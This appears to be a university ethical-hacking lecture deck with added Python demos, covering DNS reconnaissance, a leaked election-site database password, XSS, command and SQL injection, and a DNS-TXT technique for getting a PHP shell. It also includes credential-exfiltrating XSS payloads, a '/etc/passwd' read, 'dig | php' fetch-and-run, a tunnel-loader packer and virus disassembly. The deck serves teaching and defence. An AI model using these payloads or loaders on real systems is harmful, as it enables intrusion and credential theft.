(c) Boldizsár Bencsáth (bencsath@crysys.hu)
Malicious programs, botnets. Web vulnerabilities. Ethical hacking methods
How a typical hacker compromises a system
(flowchart on the slide; its states, translated)
Full integrity -> information gathering -> information about the system has leaked out
-> attempts have already been made -> one attempt succeeds: an exploit attempt yields information from inside the system, or administrator rights and further information leak out
-> system in danger: further targets and information gathering, another exploit attempt, information about the machine's internal network
-> a bug gives a shell: the attacker is in -> the whole system is broken into -> everything is compromised
Many attacks are successful by multiple steps!
Pseudo-random number generators (PRNG) 2
The named version of the BME DNS server
boldi@hbgyak:~$ dig version.bind @ns.bme.hu txt ch
; <<>> DiG 9.5.1-P3 <<>> version.bind @ns.bme.hu txt ch
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18923
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; WARNING: recursion requested but not available
;; QUESTION SECTION:
;version.bind.                  CH      TXT
;; ANSWER SECTION:
version.bind.           0       CH      TXT     "9.5.1-P3"
;; AUTHORITY SECTION:
version.bind.           0       CH      NS      version.bind.
version.bind
So you can check the version of BIND, but you cannot be sure it is not faked.
As sysadmin you might want to set this to something fake (the version option in the options block of named.conf). That is security through obscurity, but if you are too lazy to upgrade whenever it is needed, at least fake the version info: it removes the cheapest fingerprinting step from the attacker's information gathering.
Zone transfer, if allowed
boldi@hbgyak:~$ dig crysys.hu @ns2.crysys.dc.hu in axfr
; <<>> DiG 9.5.1-P3 <<>> crysys.hu @ns2.crysys.dc.hu in axfr
;; global options: printcmd
crysys.hu.              3000    IN      SOA     ns1.crysys.dc.hu. netadmin.ns1.crysys.dc.hu. 2003030439 43200 14400 2592000 3000
crysys.hu.              3000    IN      NS      ns1.crysys.dc.hu.
crysys.hu.              3000    IN      NS      ns2.crysys.dc.hu.
crysys.hu.              3000    IN      A       152.66.249.135
crysys.hu.              3000    IN      MX      10 shamir.crysys.hu.
crysys.hu.              3000    IN      MX      50 eternal.datacontact.hu.
crysys.hu.              3000    IN      TXT     "Datacontact - your nameserver..."
aggregator.crysys.hu.   3000    IN      A       195.228.45.178
albifrons.crysys.hu.    3000    IN      A       10.105.1.95
clamav.crysys.hu.       3000    IN      A       152.66.249.132
cypio.crysys.hu.        3000    IN      A       152.66.249.135
db.crysys.hu.           3000    IN      A       152.66.249.139
deserecprj.crysys.hu.   3000    IN      A       152.66.249.132
deserecvclt1.crysys.hu. 3000    IN      A       152.66.249.131
deserecvclt2.crysys.hu. 3000    IN      A       152.66.249.133
deserecvhost1.crysys.hu. 3000   IN      A       152.66.249.130
deserecvirtclt1.crysys.hu. 3000 IN      A       152.66.249.131
deserecvirtclt2.crysys.hu. 3000 IN      A       152.66.249.133
Note what a full zone dump hands the attacker: every host name, the mail relays, and even an internal (10.105.1.95) address that is not reachable from the outside.
Zone transfer authorization
boldi@fw:~$ dig crysys.hu @ns1.crysys.dc.hu in axfr
; <<>> DiG 9.5.1-P1 <<>> crysys.hu @ns1.crysys.dc.hu in axfr
;; global options: printcmd
; Transfer failed.
Limiting zone transfer in named.conf (only the listed secondaries may pull the zone):
allow-transfer { 195.228.45.175; 152.66.249.135; };
News 2010: valasztas.hu information leak, bad access rights
The JSP include files of the election results site were served as plain text:
http://valtor.valasztas.hu/valtort/jsp/
http://valtor.valasztas.hu/valtort/jsp/vlt_init_jsp_inc.txt
http://valtor.valasztas.hu/valtort/jsp/vlt_start_jsp_inc.txt
http://valtor.valasztas.hu/valtort/jsp/vlt_end_jsp_inc.txt
Quote (internal database host, user name and password in one line):
PoolSet.add("VALTORT",new Pool(new OraclePoolFactory("jdbc:oracle:thin:@172.31.100.104:1521: EKPD","valtort","valtort"),1,1,0,0,0,0,false,false));
So much for security!
The Google cache kept a copy:
http://209.85.135.132/search?q=cache:k0qfkgagn1ij:valtor. valasztas.hu/valtort/jsp/vlt_start_jsp_inc.txt+%22jdbc:oracle:t hin:%40172.31.100.104:1521:ekpd%22,%22valtort%22,%2 2valtort%22%29,&cd=3&hl=hu&ct=clnk&gl=hu&client=firefox -a
Google stored version: the leak persists after deletion
<%! String hstr(int i){return StatData.hstr(i);}%>
<%! String dstr(java.sql.Date d){return StatData.dstr(d);}%>
<%! String ifa(boolean l, String qstr, String[] param, int n) { return StatData.ifA(l, qstr, param, n);}%>
<%! String ifa(boolean l, String qstr, String[] param, String link) { return StatData.ifA(l, qstr, param, link);}%>
<%! String ifa(String qstr, String[] param, int n) { return StatData.ifA(qstr, param, n);}%>
<%
PoolSetObj pso = null;
Connection c = null;
PreparedStatement st[] = new PreparedStatement[0];
try {
  Class l_c = this.getClass();
  java.lang.reflect.Field f = l_c.getDeclaredField("sqln");
  int l_n = f.getInt(l_c);
  st = new PreparedStatement[l_n];
} catch (Exception e) {}
PreparedStatement pst = null;
ResultSet rs = null;
String sql = null;
try {
  if (PoolSet.get("VALTORT")==null)
    PoolSet.add("VALTORT",new Pool(new OraclePoolFactory("jdbc:oracle:thin:@172.31.100.104:1521:EKPD","valtort","valtort"),1,1,0,0,0,0,false,false));
  pso = PoolSet.getSetObj("VALTORT",funcName);
  c = (Connection)pso.getObj();
  StatData.loadData(c);
%>
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-2">
Example web info leak: video shown here
End of the part on information gathering / leaks
Security by obscurity: is it good?
VULNS
The main web vulnerabilities will be covered here: XSS, code injection, SQL injection
Case study: hacker attack against valasztas.hu, 2010
Offending links / XSS
http://www.valasztas.hu/pv10vt/j24p.jsp?jlcs=3&nev=mas zop+maffi%f3z%f3i
http://www.valasztas.hu/pv10vt/j24p.jsp?jlcs=22&nev=zsi desz+- +Magyar+Politikusb%FBn%F6z%F5+Sz%F6vets%E9g+
http://www.valasztas.hu/pv10vt/j24p.jsp?jlcs=20&nev=az %20egyetlen%20tiszta%20p%E1rt,%20a%20Jobbik
The parameter nev (party name) is echoed into the page without being handled carefully on the server: whatever the URL contains is shown, hence the possibility of cross-site scripting.
What is XSS (cross-site scripting)?
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites made up roughly 80% of all security vulnerabilities documented by Symantec as of 2007.[1] Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigations implemented by the site's owner.
XSS exploit scenarios
Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security.
Non-persistent (reflected): Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information. Mallory observes that Bob's website contains a reflected XSS vulnerability. Mallory crafts a URL to exploit the vulnerability and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website, but will contain Mallory's malicious code, which the website will reflect. Alice visits the URL provided by Mallory while logged into Bob's website. The malicious script embedded in the URL executes in Alice's browser as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge.
Persistent (stored): Mallory posts a message with a malicious payload to a social network. When Bob reads the message, Mallory's XSS steals Bob's cookie. Mallory can now hijack Bob's session and impersonate Bob.[16]
(There is not much difference between the two: only where the payload is stored and who delivers the link.)
root@hbgyak:/data/html# more xss.php
Hello <? echo "$nev";?>
(register_globals=on, so the query parameter nev becomes the PHP variable $nev without any check)
xss.php?nev=boldi
http://10.105.1.54/xss.php?nev=%3cscript%20%0d%0a% 3Ealert%281111%29;%3C/ScRiPt%3E
(the payload uses a line break inside the tag and mixed case in the closing tag: naive filters looking for "<script>" miss it)
XSS vulnerability found by the Acunetix scanner
If we move the mouse over the user name field, the injected handler fires.
Nexon XSS: have a look inside
<!-- Empty row (so that we do not write into the login image area) -->
<tr>
<td height="60" colspan="4"> </td>
</tr>
<!-- User name -->
<tr>
<td width="310"></td>
<td class="subtitle" width="85" align="right">user: </td>
<td width="149">
<input type="text" name="vstrusername" id="vstrusername" style="width: 80%" size="20" value="" onmouseover=prompt(938492) bad="">
</td>
<td width="30"> </td>
</tr>
The scanner's value closed the value="" attribute and added its own onmouseover= attribute; the trailing bad="" swallows the original closing quote.
Neptun XSS found by the Acunetix scanner
Details
http://neptun.bme.huzz/?res=aa%22
-> <form name="login" method="post" action="include/setcookie.php?res=aa"">
http://10.105.1.48/neptun/?res=%22%20onsubmit=%22%20i m=new%20image;%20im.src=%27http://www.crysys.hu/nept un/%27%2bdocument.forms[0].uname.value%2b%27:%27% 2bdocument.forms[0].passwd.value
Results in:
method="post" action="include/setcookie.php?res=" onsubmit=" im=new Image; im.src='http://www.crysys.hu/neptun/'+document.forms[0].uname.value+':'+document.forms[0].passwd.value">
The res parameter is reflected inside the action attribute; a %22 closes it, and the rest of the parameter becomes an onsubmit handler that sends the typed user name and password to the attacker's host when the login form is submitted.
Code injection example
Consider the following PHP code:
<? $o=`ls -la $i`; echo("result of the command:$o");
http://www.crysys.hu/code.php?i=aa
result of the command:-rw-rw-r-- 1 boldi boldi 0 Feb 24 21:40 aa
http://www.crysys.hu/code.php?i=aa;cat%20/etc/passwd|grep%20root
result of the command:-rw-rw-r-- 1 boldi boldi 0 Feb 24 21:40 aa
root:x:0:0:root:/root:/bin/bash
The variable $i is controlled by the client. The PHP script runs a shell command containing the $i string. The client can get out of the ls command by simple tricks: here a ; lets him append another command to the shell, specified entirely by the attacker.
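The same bug and its fix, as an added example (not from the slides): the user-controlled string is spliced into a shell command line, so ";" starts a second command. echo stands in for ls so the demonstration does not depend on the file system; the payload is constructed after the aa;cat /etc/passwd one above.

```python
"""Command injection via a shell-interpolated parameter, and the argv-based fix."""
import re
import subprocess

# Constructed attacker input, same shape as aa;cat /etc/passwd on the slide.
PAYLOAD = "aa;echo INJECTED"


def list_file_vulnerable(name: str) -> str:
    # Mirrors `ls -la $i` in backticks: the whole string goes through /bin/sh,
    # so ; | & $ and backquotes inside `name` are interpreted by the shell.
    out = subprocess.run("echo listing " + name, shell=True,
                         capture_output=True, text=True)
    return out.stdout


def list_file_safe(name: str) -> str:
    # Two independent defences: an allow-list on the value, and passing it as a
    # separate argv element so that no shell ever parses it.
    if not re.fullmatch(r"[A-Za-z0-9._-]{1,64}", name) or name.startswith("-"):
        raise ValueError("rejected file name: %r" % name)
    out = subprocess.run(["echo", "listing", name],
                         capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    print(list_file_vulnerable(PAYLOAD), end="")   # 'listing aa' then 'INJECTED'
    try:
        list_file_safe(PAYLOAD)
    except ValueError as err:
        print("safe version:", err)
    print(list_file_safe("aa"), end="")            # 'listing aa'
```

The allow-list is the real fix for a file name; the argv form alone would still let an attacker pass "-la" style options to the program, which is why the leading-dash check is kept as well.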
PHP fopen error: video shown here
SQL injection example
Consider the following statement:
statement = "SELECT * FROM `users` WHERE `name` = '" + username + "';"
Set username to: ' or '1'='1
This results in:
SELECT * FROM `users` WHERE `name` = '' OR '1'='1';
(will list all users)
Or a more harmful attack string:
a';DROP TABLE `users`; SELECT * FROM `userinfo` WHERE 't' = 't
Results in:
SELECT * FROM `users` WHERE `name` = 'a'; DROP TABLE `users`; SELECT * FROM `userinfo` WHERE 't' = 't';
Some tricks: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
SQL injection, very very very short summary
There are SQL commands to save/load files and sometimes to start processes, so an injection is rarely "just" a data leak.
It is very important not to let users run arbitrary SQL: never build the query by string concatenation, bind the values as parameters instead.
sqlmap videos shown here
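The two payloads from the SQL injection slide, run against an in-memory SQLite database. This is an added example, not from the slides; the users table and its rows are constructed. It shows the string-built query returning every row for ' or '1'='1, the parameterised query returning nothing for the same input, and that whether the stacked DROP TABLE runs depends on the driver: Python's sqlite3 refuses a second statement, while drivers that allow multiple statements would execute it.

```python
"""SQL injection: concatenated query vs. bound parameter, on SQLite."""
import sqlite3

TAUTOLOGY = "' or '1'='1"                     # first payload on the slide
STACKED = "a';DROP TABLE users;--"            # second payload, SQLite comment syntax


def make_db() -> sqlite3.Connection:
    # Constructed sample data.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "s1"), ("bob", "s2"), ("carol", "s3")])
    return con


def lookup_vulnerable(con, username: str) -> list:
    # statement = "SELECT * FROM users WHERE name = '" + username + "'"
    stmt = "SELECT name FROM users WHERE name = '" + username + "'"
    return sorted(r[0] for r in con.execute(stmt))


def lookup_safe(con, username: str) -> list:
    # The value is bound by the driver; it can never change the query structure.
    return sorted(r[0] for r in
                  con.execute("SELECT name FROM users WHERE name = ?", (username,)))


def stacked_attempt(con) -> str:
    # Python's sqlite3 executes one statement per call and raises on the tail
    # (sqlite3.Warning before 3.12, ProgrammingError from 3.12 on).
    stmt = "SELECT name FROM users WHERE name = '" + STACKED + "'"
    try:
        con.execute(stmt)
        return "executed"
    except (sqlite3.Warning, sqlite3.Error) as err:
        return "refused: " + str(err)


def demo() -> dict:
    con = make_db()
    return {
        "normal": lookup_vulnerable(con, "alice"),
        "tautology": lookup_vulnerable(con, TAUTOLOGY),
        "safe": lookup_safe(con, TAUTOLOGY),
        "stacked": stacked_attempt(con),
        "table_intact": lookup_safe(con, "bob") == ["bob"],
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "->", v)
```

The comment terminator (-- in SQLite, # or -- in MySQL, -- in MSSQL) absorbs the quote the application appends, which is why the slide's payload can end with an open string; the refusal here comes from the Python driver, not from SQL, so do not rely on it.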
Cross-site scripting example
PHP example: <?echo "hello $user";?>
http://www.crysys.hu/code2.php?user=boldi
hello boldi
http://www.crysys.hu/code2.php?user=%3cscript%3ealert%281%29%3c/s cript%3e
(that is: http://www.crysys.hu/code2.php?user=<script>alert(1)</script>)
Will result in an alert box. Any JavaScript code can be embedded this way, specified by the attacker.
The code is specified by the creator of the URL, but it is served by the attacked server (the crysys.hu PHP page).
The script is executed on the client, in the context of the server's origin (here crysys.hu), so the script can read e.g. cookies of the crysys.hu domain. (The browser's JavaScript interpreter believes the code comes from crysys.hu, not from the URL's creator!)
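Reflected XSS in the two contexts the slides show, as an added example that is not part of the original deck: a parameter echoed into the page body (the code2.php?user= case) and one echoed into an attribute value (the Neptun ?res= case, where a double quote closes the action attribute and an onsubmit handler is smuggled in). The form template, the evil.example host and the audit helper are constructed; the fix is context-aware output encoding.

```python
"""Reflected XSS: body and attribute context, and the encoding that closes both."""
import html
import urllib.parse
from html.parser import HTMLParser

# Constructed payloads modelled on the slides.
BODY_PAYLOAD = "<script>alert(1)</script>"
ATTR_PAYLOAD = ('" onsubmit="im=new Image;im.src=\'http://evil.example/\''
                '+document.forms[0].passwd.value')


def render_vulnerable(user: str, res: str) -> str:
    # Like <?echo "hello $user";?> and action="setcookie.php?res=<res>": raw splice.
    return ('<p>hello %s</p>\n'
            '<form name="login" method="post" action="include/setcookie.php?res=%s">\n'
            '<input name="passwd"></form>') % (user, res)


def render_safe(user: str, res: str) -> str:
    # Body context: html.escape turns < > & " ' into entities, so no tag can start.
    # URL-valued attribute: percent-encode the value first (it is a query string),
    # then HTML-escape it so it cannot terminate the attribute either.
    return render_vulnerable(html.escape(user, quote=True),
                             html.escape(urllib.parse.quote(res, safe=""), quote=True))


class _Audit(HTMLParser):
    """Counts script elements and on* handlers the browser would actually see."""
    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.event_handlers += [name for name, _ in attrs if name.startswith("on")]


def audit(page: str) -> dict:
    p = _Audit()
    p.feed(page)
    return {"script_tags": p.script_tags, "event_handlers": p.event_handlers}


if __name__ == "__main__":
    print(audit(render_vulnerable(BODY_PAYLOAD, ATTR_PAYLOAD)))  # 1 script, ['onsubmit']
    print(audit(render_safe(BODY_PAYLOAD, ATTR_PAYLOAD)))        # 0 scripts, []
```

The audit uses the same tokenizer rules a browser applies to a start tag, which is why it is a better check than grepping for "<script": the Nexon and Neptun findings contain no script tag at all, only an injected event-handler attribute.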
PHP in DNS: Ethical Hacker conference material
We have a vulnerable web page.
We can run commands, but we would like a shell.
Command execution is size-limited: at most ~26 characters.
We cannot write to the web subdirectories.
No port can be opened outwards from the vulnerable machine.
The vulnerable machine is reachable from outside only on port 80.
DNS, however, visibly works.
The vulnerable script is a certificate viewer (this is important)
$ more read.php
Reading cert file
<?
$certname=$_REQUEST["certname"];          # user-controlled string
$certname=substr($certname,0,26);
sleep(2); #Against brute force
$res=`cat certs/$certname`;               # shell command, like exec, system, etc.
if (preg_match("/ok/",$res)) {
  echo("cert loaded successfully: ".$res."\n<br>");}
else {
  echo("bad certname (debug:<pre> file:$certname res:$res </pre>) ");
}
Our hands are tied
We cannot upload a reverse PHP shell, because we cannot write into the web directories.
A reverse shell cannot open a connection outwards.
Not even wget or tftp would work, files cannot be uploaded.
We have no root rights either, we cannot kill the web server.
What should we do?
Several problems have to be solved
What transport medium can we use to talk to a shell?
How do we deliver the code that provides the shell, and what should it be?
DNS tunnel
The shell's transport medium cannot be the web, since we cannot create new content.
Every other port is closed.
Only DNS remains as a transport medium. The answer is given: a DNS tunnel.
(figure: IP packet -> uploaded DNS tunnel application on the victim -> DNS request -> local DNS -> DNS server -> DNS tunnel endpoint operated by the attacker -> IP packet)
With what?
There are many options, but also problems:
Iodined: tun interface, root rights needed on both sides
Heyoka
OzymanDNS
Squeeza
NSTX: tun virtual interface, root rights needed
Dns2tcp
DNS2TCP
http://www.hsc.fr/ressources/outils/dns2tcp/index.html.en
http://www.hsc.fr/ressources/outils/dns2tcp/download/dns2tcp- 0.5.2.tar.gz
We chose DNS2TCP: C implementation, small size, portability (easy to build).
No root rights are needed on the client.
We only have to upload the roughly 30 kilobyte program and start it:
-rwxr-xr-x 1 root root 38832 Apr 18 08:06 dns2tcpc
-rwxr-xr-x 1 root root 39844 Apr 18 08:06 dns2tcpd
How do we upload the DNS tunnel application?
Upload it byte by byte! That way each command fits in 24 characters, e.g.:
login=;printf \\001 >>/tmp/a
In this way one arbitrary binary byte per request can be appended to a file.
A file upload needs a very large number of requests, and the script contains a delay of a few seconds, so we could be uploading for days (at 2 s per byte, the 38832-byte dns2tcpc alone takes more than 21 hours).
This is not going to work.
Let us use DNS!
We have to use DNS for the code upload as well.
Put PHP code into DNS data and let the PHP interpreter do the work!
Self-extracting PHP code: code and data in one place.
Almost a single command is enough for the upload:
dig prj.hu in txt | php   (you can try it!)
Of course there are other solutions, e.g. data in DNS, extractor code separately.
How it works
Sample query:
boldi@eternal:~$ dig prj.hu in txt
; <<>> DiG 9.7.3 <<>> prj.hu in txt
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34449
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; QUESTION SECTION:
;prj.hu.                        IN      TXT
;; ANSWER SECTION:
prj.hu.                 20      IN      TXT     "v=spf1 a mx -all"
Let us put PHP code into it
; <<>> DiG 9.7.3 <<>> prj.hu in txt
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34449
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; QUESTION SECTION:
;prj.hu.                        IN      TXT
;; ANSWER SECTION:
prj.hu.                 20      IN      TXT     " <?php echo 'hello world '.(3+3)?>"
prj.hu.                 20      IN      TXT     "v=spf1 a mx -all"
Let us look at the result!
Result: it runs fine (everything outside the <?php ... ?> tags is passed through, the tag is executed)
; <<>> DiG 9.7.3 <<>> prj.hu in txt
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45532
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; QUESTION SECTION:
;prj.hu.                        IN      TXT
;; ANSWER SECTION:
prj.hu.                 20      IN      TXT     "v=spf1 a mx -all"
prj.hu.                 20      IN      TXT     " hello world 6"
Problems
; and double quotes cannot be used: dig prints them as \; and \".
Fortunately closing the PHP tag is equivalent to a ;, e.g. <?php echo a?><?php echo b?>
Post-processing would also be possible (stripping the \ with sed).
The double quote (") cannot be used, but the apostrophe (') can.
Broken: prj.hu. 1 IN TXT " <?php echo " "hello" "world" ".2+2\;?>
A good realisation: @ 5 TXT " <?php echo 'hello world '.(3+3)?>"
Furthermore
One TXT string can be at most 255 bytes.
An entry may have several TXT strings.
The whole record cannot exceed 64k, and a UDP answer cannot exceed 4k.
Some firewalls may limit the size.
Other special characters do not work either, or are awkward to handle.
A separate problem: the records are served round-robin (random order).
Round-robin answer: random order
Intended code:
prj.hu. 20 IN TXT " <?php $a=1?>"
prj.hu. 20 IN TXT " <?php $a=$a+1?>"
prj.hu. 20 IN TXT " <?php echo $a?>"
Data received on download:
;; ANSWER SECTION:
prj.hu. 20 IN TXT " <?php $a=$a+1?>"
prj.hu. 20 IN TXT " <?php echo $a?>"
prj.hu. 20 IN TXT " <?php $a=1?>"
Obviously the two sequences do not lead to the same result.
Solution to the ordering problem
goto exists only in PHP 5.3.0 and above
p3 5 TXT " <?php a15:?><?php if ($t!=1) {?><?php goto a0?><?php }?><?php goto a16
p3 5 TXT " <?php a52:?><?php if ($t!=1) {?><?php goto a0?><?php }?><?php goto a53
p3 5 TXT " <?php a0:?><?php \$t=1?> <?php goto a1?>
Every record is a labelled block: if $t is not set yet, whichever block is printed first jumps to a0, which sets $t=1 and then jumps to a1, a2, ... in order, so the execution order is fixed regardless of the order of the answer.
At the end of the run: die();
Solutions
Code containing special characters can be base64-encoded and, after decoding, run with eval.
Larger strings can be cut up and encoded in pieces, one per TXT record, then concatenated.
Keep the TTL low, so we can refresh if the code is bad.
Let us put it together
Dns2tcp: the DNS tunnel, compiled.
packer.php: packs the DNS tunnel client and our longer commands into DNS records (preparation).
DNS server: the result has to be loaded into the DNS.
Execution: a single command activates the result on the vulnerable machine.
Expected result: shell access.
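A packer for the PHP-over-DNS-TXT technique of the preceding slides (Let us use DNS!, Problems, Further, Round-robin answer, Solutions), as an added example; it is not the packer.php from the talk. It takes the "other solution" mentioned on the slides rather than the goto trick: the payload is base64 (so ;, ", backslash and newlines never reach the zone file), each TXT string carries a zero-padded sequence prefix, and the unpacker sorts on that prefix, so the random answer order no longer matters. The owner name p3, the TTL and the PHP loader text are constructed.

```python
"""Pack a PHP payload into <=255-byte TXT strings and reassemble it from shuffled records."""
import base64
import random

MAX_TXT = 255          # one <character-string> of a TXT RDATA is at most 255 bytes
PREFIX_LEN = 4         # "NNN:" sequence prefix inside each string

# Constructed stand-in for the stage that writes dns2tcpc to disk on the victim.
PHP_LOADER = (
    "<?php\n"
    "$f = fopen('/tmp/dns2tcpc', 'wb');\n"
    "fwrite($f, base64_decode($blob));   // $blob: a second record set, data only\n"
    "fclose($f); chmod('/tmp/dns2tcpc', 0755);\n"
    "echo 'ok';\n"
    "?>\n"
)


def pack(php_source: str, owner: str = "p3", ttl: int = 5) -> list:
    """Return zone-file TXT lines carrying php_source, one string per record."""
    b64 = base64.b64encode(php_source.encode()).decode()
    width = MAX_TXT - PREFIX_LEN
    chunks = [b64[i:i + width] for i in range(0, len(b64), width)]
    if len(chunks) > 1000:
        raise ValueError("payload needs more than 1000 records; widen the prefix")
    return ['%s %d TXT "%03d:%s"' % (owner, ttl, i, c) for i, c in enumerate(chunks)]


def parse_txt_rdata(lines) -> list:
    """Pull the quoted string out of zone-style or dig-style TXT lines."""
    return [ln.split('"', 1)[1].rsplit('"', 1)[0] for ln in lines]


def unpack(txt_strings) -> str:
    """Reorder by sequence prefix and decode; input order is irrelevant."""
    parts = sorted(txt_strings, key=lambda s: int(s.split(":", 1)[0]))
    seqs = [int(s.split(":", 1)[0]) for s in parts]
    if seqs != list(range(len(seqs))):
        raise ValueError("missing or duplicated TXT chunk: %r" % seqs)
    return base64.b64decode("".join(s.split(":", 1)[1] for s in parts)).decode()


def max_string_len(records) -> int:
    return max(len(s.encode()) for s in parse_txt_rdata(records))


def roundtrip(php_source: str, seed: int = 7) -> str:
    """Pack, shuffle the records as a round-robin server would, unpack."""
    strings = parse_txt_rdata(pack(php_source))
    random.Random(seed).shuffle(strings)
    return unpack(strings)


if __name__ == "__main__":
    for line in pack(PHP_LOADER):
        print(line)
    print(roundtrip(PHP_LOADER) == PHP_LOADER)   # True
```

On the victim the unpacker is one short PHP stage that does the same sort-and-decode before eval, so the 26-character command budget of read.php only has to fetch and pipe the first record set; the base64 step also sidesteps the quoting problems from the Problems slide at the price of a third more bytes per record.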
1. Use tools 2. Use your mind
1. Use tools
Use tools, as they are more up to date than you.
Example: Qualys BrowserCheck is a great tool to test your browser's plugins.
Network vulnerability scanners
Target: a system, an IP range, etc.
Goal: to find vulnerable software components of the target in a fast and efficient way, testing against tens of thousands of vulnerabilities in seconds.
Working method:
Scans the target for services and identifies software versions.
Performs basic tests to find vulnerable services (e.g. is anonymous FTP login enabled?).
Generally uses a number of active plugins to test the target service against known vulnerabilities.
Uses a database of vulnerable software version numbers; matching only this against the identified version can produce a large number of false positives (a backported fix keeps the old version string).
Generally a lot more is incorporated (login support, trying weak passwords, fuzzing tests, etc.).
Problems and advantages of vulnerability scanners
Problems:
Limited availability of free tools (Nessus went from free and open source to closed source with a limited free version).
Vulnerability databases have to be kept updated.
Knowledge of the OS and services may be needed for accurate results (to avoid false positives).
Attacks against custom settings, tools and software components are generally missing.
Generally, no new attack or system-wide vulnerability can be found. Human knowledge is still needed.
Advantages:
Automatic running, fast scanning of multiple hosts against thousands of vulnerabilities.
Good-looking automatic reports as audit material.
Most internet-wide scanning attacks can be prevented (those attackers also use standard attacks and databases).
Web vulnerability scanner
Acunetix Web Vulnerability Scanner is a great tool to find web attacks, including previously unknown instances in custom applications (SQL injection, cross-site scripting).
The trial version only checks for XSS.
1. Acunetix XSS scanner: VIDEO acunetix-webscan-1-v1.avi 04:20
2. NESSUS
Homework: install and test Nessus, eEye Retina Community Edition, Nmap.
MALWARE
Malware = malicious + software
Software designed to infiltrate or damage a computer system without the owner's informed consent:
computer virus, worm, Trojan horse, rootkit, backdoor, spyware, keylogger, adware, zombie/bot, fake antivirus product, etc.
Computer virus: why the name?
A virus is not a full program, it cannot live alone.
It reproduces itself and spreads ("infection"); some transfer medium and user interaction might be needed.
It does nasty things (or not).
Most so-called viruses are not viruses by this definition.
Worm: can reproduce automatically (no user needed).
Trojan horse: the user thinks the code is OK, but it isn't.
Rootkit, backdoor: remains on the computer and is hard to find.
Bot: participates in a distributed network for malicious activity.
Virus classification
boot sector; file infector; macro virus; encrypted virus; stealth virus;
polymorphic virus (modifications to avoid identification: encryption, inserting dummy code);
metamorphic virus (the same, but instead of inserting dummy code it rewrites itself into code that does the same)
Old-school file virus
Modifies executable files, appends its own code to them (how? .com: simple; .exe: a bit more difficult).
Whenever the executable is loaded, the virus is started.
It might instantly check one/more/all other executables (only .com / only .exe / all) and infect them,
or just load into memory, stay resident (TSR), and infect whenever any program is executed.
It might modify or encrypt itself at every infection; some decryption part is still the same (an opportunity to recognize the virus).
20 bytes are enough for a basic encryption scheme.
Tricky modifications can be done by the virus (e.g. xor ax,ax ; mov ax,0 ; sub ax,ax are the same).
Other viruses
Boot virus: infects the boot sector (if you leave a floppy in the drive, it loads the code, and then...) (now: USB autorun malware).
Macro virus: Word/Excel macros affected.
Hardware-level destructive virus: e.g. CIH clearing the BIOS, or CD-ROM firmware bugs.
BIOS virus: part of the code is stored in the BIOS, so disinfection might be hard (one of the latest tricks, difficult).
Encrypting (ransom) malware: encrypts all the files, decryption only when you pay.
Goals of the virus writers
Old times: just to show it is possible to write such code, proof of concept (first virus ~1982).
Be famous (or collect: "vxers").
For fun.
Do harmful activities.
Write a better virus: harder to identify, harder to disinfect, faster spreading, ...
Earn money: spam, fake virus scanners, phishing, password and credit card number collection, ransom (by encryption), fake/rogue security software, etc.
Potyogós virus (Cascade)
From 1987, the starting time of a new era for viruses.
1701 bytes.
The first virus that caused mass infection in Hungary.
Encrypts itself in some form (no, not AES, nor RSA).
Nasty code: after some time, characters start to fall off the screen.
TSR code.
http://www.youtube.com/watch?v=uwlg6tteqrg
Also check: http://kannan.jumbledthoughts.com/index.php/21-virus-and-othermalware-payload-videos/
Potyogós in action
Binary version of the Polimer virus: only ~1000 bytes
Part of the disassembled Polimer virus
polimer          proc    far
start::
        jmp     loc_4
        db      00h, 3Fh
        db      7 dup (3Fh)
        db      43h, 4Fh, 4Dh, 00h, 02h, 00h
        db      40h, 00h, 8Dh, 36h, 80h, 00h
        db      03h, 00h
        db      14 dup (0)
data_59 db      'A legjobb kazetta a POLIMER kaze'
        db      'tta! Vegye ezt! ', 0Ah, 0Dh
        db      '$'
        db      'ERROR', 0Ah, 0Dh, '$'
data_60 dw      5
data_61 dw      147Dh
loc_1::
        mov     si,data_46e
        mov     di,data_49e
        mov     cx,30h
        cld                             ; Clear direction
        rep     movsb                   ; Rep when cx >0 Mov [si] to es:[di]
        jmp     $-0BAh
loc_2::
        jmp     loc_10
loc_3::
        jmp     loc_9
loc_4::
        mov     al,0
        mov     ah,0Eh
        int     21h                     ; DOS Services ah=function 0Eh
                                        ;  set default drive dl (0=a:)
        mov     dx,data_36e
        mov     ah,1Ah
        int     21h                     ; DOS Services ah=function 1Ah
                                        ;  set DTA (disk xfer area) ds:dx
